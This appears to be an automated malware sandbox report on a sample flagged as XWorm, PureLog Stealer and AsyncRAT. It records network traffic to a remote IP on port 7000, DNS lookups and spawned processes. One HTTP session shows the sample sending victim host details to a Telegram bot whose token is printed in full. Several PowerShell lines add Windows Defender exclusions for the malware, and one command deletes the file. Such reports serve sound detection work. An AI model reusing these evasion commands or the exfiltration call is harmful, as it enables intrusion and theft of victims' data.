Dec 5, 2024 19:42:23.183664083 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:42:23.186430931 CET  49742  7000  192.168.2.4  185.196.8.239
Dec 5, 2024 19:42:23.349806070 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:42:26.191755056 CET  49742  7000  192.168.2.4  185.196.8.239
Dec 5, 2024 19:42:26.311572075 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:42:26.601407051 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:42:26.604302883 CET  49742  7000  192.168.2.4  185.196.8.239
Dec 5, 2024 19:42:26.725223064 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:42:27.613878965 CET  49742  7000  192.168.2.4  185.196.8.239
Dec 5, 2024 19:42:27.733982086 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:42:28.023629904 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:42:28.025141001 CET  49742  7000  192.168.2.4  185.196.8.239
Dec 5, 2024 19:42:28.144985914 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:42:33.270169020 CET  49742  7000  192.168.2.4  185.196.8.239
Dec 5, 2024 19:42:33.390075922 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:42:33.680033922 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:42:33.682516098 CET  49742  7000  192.168.2.4  185.196.8.239
Dec 5, 2024 19:42:33.802273989 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:42:36.096592903 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:42:36.189834118 CET  49742  7000  192.168.2.4  185.196.8.239
Dec 5, 2024 19:42:37.817238092 CET  49742  7000  192.168.2.4  185.196.8.239
Dec 5, 2024 19:42:37.938021898 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:42:37.938085079 CET  49742  7000  192.168.2.4  185.196.8.239
Dec 5, 2024 19:42:38.058763027 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:42:38.227034092 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:42:38.229933023 CET  49742  7000  192.168.2.4  185.196.8.239
Dec 5, 2024 19:42:38.349910021 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:42:38.418977976 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:42:38.420603991 CET  49742  7000  192.168.2.4  185.196.8.239
Dec 5, 2024 19:42:38.540363073 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:42:43.285732985 CET  49742  7000  192.168.2.4  185.196.8.239
Dec 5, 2024 19:42:43.405705929 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:42:43.405957937 CET  49742  7000  192.168.2.4  185.196.8.239
Dec 5, 2024 19:42:43.525729895 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:42:43.696326017 CET  7000  49742  185.196.8.239  192.168.2.4
Dec 5, 2024 19:42:43.704189062 CET  49742  7000  192.168.2.4  185.196.8.239
                                                                                        Dec 5, 2024 19:42:43.823995113 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:42:43.888448954 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:42:43.957241058 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:42:44.119843960 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:42:44.240210056 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:42:45.959484100 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:42:46.079230070 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:42:46.372474909 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:42:46.375024080 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:42:46.495085955 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:42:58.473726034 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:42:58.594867945 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:42:58.883826971 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:42:58.890883923 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:42:59.012016058 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:03.833288908 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:43:03.953114986 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:04.020193100 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:43:04.140280008 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:04.245042086 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:04.246700048 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:43:04.366609097 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:04.437499046 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:04.438813925 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:43:04.559252977 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:04.629434109 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:43:04.749583006 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:05.040102005 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:05.042164087 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:43:05.162108898 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:06.096582890 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:06.163345098 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:43:13.864017963 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:43:13.983808041 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:13.983876944 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:43:14.103694916 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:14.103750944 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:43:14.223606110 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:14.274398088 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:14.276671886 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:43:14.396787882 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:14.415537119 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:14.417227983 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:43:14.594500065 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:14.594512939 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:14.596236944 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:43:14.717488050 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:14.834542990 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:14.839915991 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:43:15.001737118 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:21.911428928 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:43:22.031172991 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:22.322407961 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:22.324502945 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:43:22.445055008 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:24.223189116 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:43:24.343092918 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:24.696129084 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:24.698239088 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:43:24.817955017 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:29.270145893 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:43:29.389885902 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:29.389955997 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:43:29.510421991 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:29.688528061 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:29.693242073 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:43:29.813028097 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:29.881428003 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:29.883677959 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:43:30.003360987 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:36.090598106 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:36.249016047 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:43:39.786422014 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:43:39.906135082 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:40.196613073 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:40.201443911 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:43:40.321149111 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:40.927972078 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:43:41.047799110 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:41.339454889 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:41.341753960 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:43:41.461779118 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:41.614613056 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:43:41.734411001 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:42.024594069 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:42.026532888 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:43:42.146543026 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:54.129905939 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:43:54.250108004 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:54.541105032 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:54.547027111 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:43:54.667028904 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:56.410813093 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:43:56.530689955 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:56.692152023 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:43:56.812201023 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:56.823146105 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:56.828046083 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:43:56.993850946 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:57.103007078 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:57.108010054 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:43:57.227807999 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:44:06.093313932 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:44:06.145068884 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:44:08.248128891 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:44:08.368556976 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:44:08.658761024 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:44:08.659554958 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:44:08.779423952 CET700049742185.196.8.239192.168.2.4
Timestamp                           Source Port  Dest Port  Source IP    Dest IP
Dec 5, 2024 19:40:01.839572906 CET  52248        53         192.168.2.4  1.1.1.1
Dec 5, 2024 19:40:01.983913898 CET  53           52248      1.1.1.1      192.168.2.4
Dec 5, 2024 19:40:33.712004900 CET  49174        53         192.168.2.4  1.1.1.1
Dec 5, 2024 19:40:33.849917889 CET  53           49174      1.1.1.1      192.168.2.4

Timestamp                           Source IP    Dest IP  Trans ID  OP Code             Name              Type            Class        DNS over HTTPS
Dec 5, 2024 19:40:01.839572906 CET  192.168.2.4  1.1.1.1  0x7c33    Standard query (0)  ip-api.com        A (IP address)  IN (0x0001)  false
Dec 5, 2024 19:40:33.712004900 CET  192.168.2.4  1.1.1.1  0xed25    Standard query (0)  api.telegram.org  A (IP address)  IN (0x0001)  false

Timestamp                           Source IP  Dest IP      Trans ID  Reply Code    Name              CName  Address          Type            Class        DNS over HTTPS
Dec 5, 2024 19:40:01.983913898 CET  1.1.1.1    192.168.2.4  0x7c33    No error (0)  ip-api.com        -      208.95.112.1     A (IP address)  IN (0x0001)  false
Dec 5, 2024 19:40:33.849917889 CET  1.1.1.1    192.168.2.4  0xed25    No error (0)  api.telegram.org  -      149.154.167.220  A (IP address)  IN (0x0001)  false

• api.telegram.org
• ip-api.com
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.4  49730        208.95.112.1    80                2852  C:\Users\user\Desktop\file.exe

Timestamp                           Bytes transferred  Direction  Data (on the following lines)
Dec 5, 2024 19:40:02.117707014 CET  80                 OUT
    GET /line/?fields=hosting HTTP/1.1
    Host: ip-api.com
    Connection: Keep-Alive
Dec 5, 2024 19:40:03.304946899 CET  175                IN
    HTTP/1.1 200 OK
    Date: Thu, 05 Dec 2024 18:40:02 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 6
    Access-Control-Allow-Origin: *
    X-Ttl: 60
    X-Rl: 44
    Data Raw: 66 61 6c 73 65 0a
    Data Ascii: false


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
0           192.168.2.4  49740        149.154.167.220  443               2852  C:\Users\user\Desktop\file.exe

Timestamp                Bytes transferred  Direction  Data (on the following lines)
2024-12-05 18:40:35 UTC  447                OUT
    GET /bot8070077125:AAEdRIyp1anHye9Y0jcV8uNF6U4mmijN8Pk/sendMessage?chat_id=1818813749&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A4C67EC226C1C2FB3C434%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20YD8OYZ2%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1
    Host: api.telegram.org
    Connection: Keep-Alive
2024-12-05 18:40:35 UTC  388                IN
    HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Thu, 05 Dec 2024 18:40:35 GMT
    Content-Type: application/json
    Content-Length: 440
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET, POST, OPTIONS
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-05 18:40:35 UTC  440                IN
    Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 38 30 37 30 30 37 37 31 32 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 42 69 6e 61 6e 63 65 42 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 42 69 6e 61 47 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 31 38 38 31 33 37 34 39 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 64 72 6b 75 73 74 30 6d 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 44 72 4b 75 73 74 30 6d 5f 6e 65 77 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 34 32 34 30 33 35 2c 22 74 65 78 74 22 3a 22 5c 75 32 36 32 30 20 5b 58 57 6f 72
    Data Ascii: {"ok":true,"result":{"message_id":41,"from":{"id":8070077125,"is_bot":true,"first_name":"BinanceBot","username":"BinaGoBot"},"chat":{"id":1818813749,"first_name":"drkust0m","username":"DrKust0m_new","type":"private"},"date":1733424035,"text":"\u2620 [XWor


Target ID: 0
Start time: 13:39:55
Start date: 05/12/2024
Path: C:\Users\user\Desktop\file.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\file.exe"
Imagebase: 0xc30000
File size: 3'507'712 bytes
MD5 hash: 7823E902900881094372948957825FE1
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1759365253.0000000005E50000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1694062530.0000000000C32000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1754386213.0000000003504000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1754386213.0000000003504000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1754386213.0000000003504000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation: low
Has exited: true

Target ID: 1
Start time: 13:40:00
Start date: 05/12/2024
Path: C:\Users\user\Desktop\file.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\file.exe"
Imagebase: 0x520000
File size: 3'507'712 bytes
MD5 hash: 7823E902900881094372948957825FE1
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000001.00000002.4176352782.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000001.00000002.4156478966.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.4156478966.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000001.00000002.4156478966.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000001.00000002.4176352782.0000000002C13000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: false

Target ID: 2
Start time: 13:40:00
Start date: 05/12/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: "cmd" /c timeout /t 1 && DEL /f file.exe
Imagebase: 0x240000
                                                                                        File size:236'544 bytes
                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:3
                                                                                        Start time:13:40:01
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:4
                                                                                        Start time:13:40:01
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Windows\SysWOW64\timeout.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:timeout /t 1
                                                                                        Imagebase:0x2d0000
                                                                                        File size:25'088 bytes
                                                                                        MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:6
                                                                                        Start time:13:40:03
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe'
                                                                                        Imagebase:0xfa0000
                                                                                        File size:433'152 bytes
                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:7
                                                                                        Start time:13:40:03
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:9
                                                                                        Start time:13:40:08
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'file.exe'
                                                                                        Imagebase:0xfa0000
                                                                                        File size:433'152 bytes
                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:10
                                                                                        Start time:13:40:08
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:12
                                                                                        Start time:13:40:13
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\WindowsUpdaterConf.exe'
                                                                                        Imagebase:0xfa0000
                                                                                        File size:433'152 bytes
                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:13
                                                                                        Start time:13:40:13
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:14
                                                                                        Start time:13:40:14
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Users\user\AppData\Roaming\file.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\AppData\Roaming\file.exe"
                                                                                        Imagebase:0xe80000
                                                                                        File size:3'507'712 bytes
                                                                                        MD5 hash:7823E902900881094372948957825FE1
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\file.exe, Author: Joe Security
                                                                                        Antivirus matches:
                                                                                        • Detection: 47%, ReversingLabs
                                                                                        Has exited:true

                                                                                        Target ID:19
                                                                                        Start time:13:40:20
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5780 -s 1216
                                                                                        Imagebase:0xd50000
                                                                                        File size:483'680 bytes
                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:20
                                                                                        Start time:13:40:22
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WindowsUpdaterConf.exe'
                                                                                        Imagebase:0xfa0000
                                                                                        File size:433'152 bytes
                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:21
                                                                                        Start time:13:40:22
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:22
                                                                                        Start time:13:40:22
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Users\user\AppData\Roaming\file.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\AppData\Roaming\file.exe"
                                                                                        Imagebase:0xf0000
                                                                                        File size:3'507'712 bytes
                                                                                        MD5 hash:7823E902900881094372948957825FE1
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:24
                                                                                        Start time:13:40:28
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3020 -s 1140
                                                                                        Imagebase:0xd50000
                                                                                        File size:483'680 bytes
                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:25
                                                                                        Start time:13:40:32
                                                                                        Start date:05/12/2024
